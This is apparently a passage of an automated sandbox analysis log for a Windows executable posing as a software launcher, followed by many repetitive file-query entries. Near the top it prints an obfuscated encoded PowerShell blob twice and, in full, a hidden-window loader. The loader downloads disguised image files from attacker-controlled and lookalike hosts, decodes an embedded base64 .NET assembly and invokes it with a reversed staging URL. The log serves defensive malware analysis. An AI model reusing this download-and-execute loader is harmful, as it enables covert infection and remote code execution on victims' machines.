'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@k@ei@eqb0@gu@cw@g@d0@i@@n@gg@d@b0@cc@ow@n@@o@j@bc@hk@d@bl@hm@mg@g@d0@i@@n@h@@cw@6@c8@lw@n@ds@dq@k@cq@b@bm@hm@z@bm@hm@z@bn@c@@pq@g@c@@j@bc@hk@d@bl@hm@i@@r@cq@qgb5@hq@zqbz@di@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bs@gk@bgbr@hm@i@@9@c@@q@@o@cg@j@bs@gy@cwbk@gy@cwbk@gc@i@@r@c@@jwbi@gk@d@bi@hu@ywbr@gu@d@@u@g8@cgbn@c8@zgbz@gq@zgbz@gq@zgbz@c8@zgbz@gq@zgbk@hm@zgbz@gq@zgbz@gq@zg@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@y@c4@agbw@gc@pw@x@dm@nw@x@de@mw@n@ck@l@@g@cg@j@bs@gy@cwbk@gy@cwbk@gc@i@@r@c@@jwbv@gy@aqbj@gu@mw@2@du@lgbn@gk@d@bo@hu@yg@u@gk@bw@v@de@lwb0@gu@cwb0@c4@agbw@gc@jw@p@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@9@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@@k@gw@aqbu@gs@cw@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@lqbu@gu@i@@k@g4@dqbs@gw@kq@g@hs@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c@@pq@g@fs@uwb5@hm@d@bl@g0@lgbu@gu@e@b0@c4@rqbu@gm@bwbk@gk@bgbn@f0@og@6@fu@v@bg@dg@lgbh@gu@d@bt@hq@cgbp@g4@zw@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@fm@v@bb@fi@v@@+@d4@jw@7@c@@j@bl@g4@z@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@rqbo@eq@pg@+@cc@ow@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@cwb0@ge@cgb0@ey@b@bh@gc@kq@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bl@g4@z@bg@gw@yqbn@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@c0@zwbl@c@@m@@g@c0@yqbu@gq@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@c0@zwb0@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $bytes = 'htt'; $bytes2 = 'ps://'; $lfsdfsdg = $bytes +$bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64lengthh = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64lengthh); $endindex = $imagetext.indexof($endflag); $commandbytes = [system.convert]::frombase64string($base64command); $endindex = $imagetext.indexof($endflag); $endindex = $imagetext.indexof($endflag); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $endindex = $imagetext.indexof($endflag); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.ieahfaf/selif_cilbup/211.622.06.26//:', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@k@ei@eqb0@gu@cw@g@d0@i@@n@gg@d@b0@cc@ow@n@@o@j@bc@hk@d@bl@hm@mg@g@d0@i@@n@h@@cw@6@c8@lw@n@ds@dq@k@cq@b@bm@hm@z@bm@hm@z@bn@c@@pq@g@c@@j@bc@hk@d@bl@hm@i@@r@cq@qgb5@hq@zqbz@di@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bs@gk@bgbr@hm@i@@9@c@@q@@o@cg@j@bs@gy@cwbk@gy@cwbk@gc@i@@r@c@@jwbi@gk@d@bi@hu@ywbr@gu@d@@u@g8@cgbn@c8@zgbz@gq@zgbz@gq@zgbz@c8@zgbz@gq@zgbk@hm@zgbz@gq@zgbz@gq@zg@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@y@c4@agbw@gc@pw@x@dm@nw@x@de@mw@n@ck@l@@g@cg@j@bs@gy@cwbk@gy@cwbk@gc@i@@r@c@@jwbv@gy@aqbj@gu@mw@2@du@lgbn@gk@d@bo@hu@yg@u@gk@bw@v@de@lwb0@gu@cwb0@c4@agbw@gc@jw@p@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@9@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@@k@gw@aqbu@gs@cw@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@c@@lqbu@gu@i@@k@g4@dqbs@gw@kq@g@hs@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c@@pq@g@fs@uwb5@hm@d@bl@g0@lgbu@gu@e@b0@c4@rqbu@gm@bwbk@gk@bgbn@f0@og@6@fu@v@bg@dg@lgbh@gu@d@bt@hq@cgbp@g4@zw@o@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@p@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@hq@yqby@hq@rgbs@ge@zw@g@d0@i@@n@dw@p@bc@ee@uwbf@dy@n@bf@fm@v@bb@fi@v@@+@d4@jw@7@c@@j@bl@g4@z@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@rqbo@eq@pg@+@cc@ow@g@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@d0@i@@k@gk@bqbh@gc@zqbu@gu@e@b0@c4@sqbu@gq@zqb4@e8@zg@o@cq@cwb0@ge@cgb0@ey@b@bh@gc@kq@7@c@@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bl@g4@z@bg@gw@yqbn@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@bp@gy@i@@o@cq@cwb0@ge@cgb0@ek@bgbk@gu@e@@g@c0@zwbl@c@@m@@g@c0@yqbu@gq@i@@k@gu@bgbk@ek@bgbk@gu@e@@g@c0@zwb0@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $bytes = 'htt'; $bytes2 = 'ps://'; $lfsdfsdg = $bytes +$bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/fsdfsdfs/fsdfdsfsdfsdf/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64lengthh = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64lengthh); $endindex = $imagetext.indexof($endflag); $commandbytes = [system.convert]::frombase64string($base64command); $endindex = $imagetext.indexof($endflag); $endindex = $imagetext.indexof($endflag); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $endindex = $imagetext.indexof($endflag); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.ieahfaf/selif_cilbup/211.622.06.26//:', '0', 'startupname', 'msbuild', '0'))}}" .exe -windowstyle hidden -exec	Jump to behavior

Source: C:\Users\user\Desktop\IMSoftware{Launcher}3.21.exe

Code function: 0_2_00007FF66FD612EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,

0_2_00007FF66FD612EC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
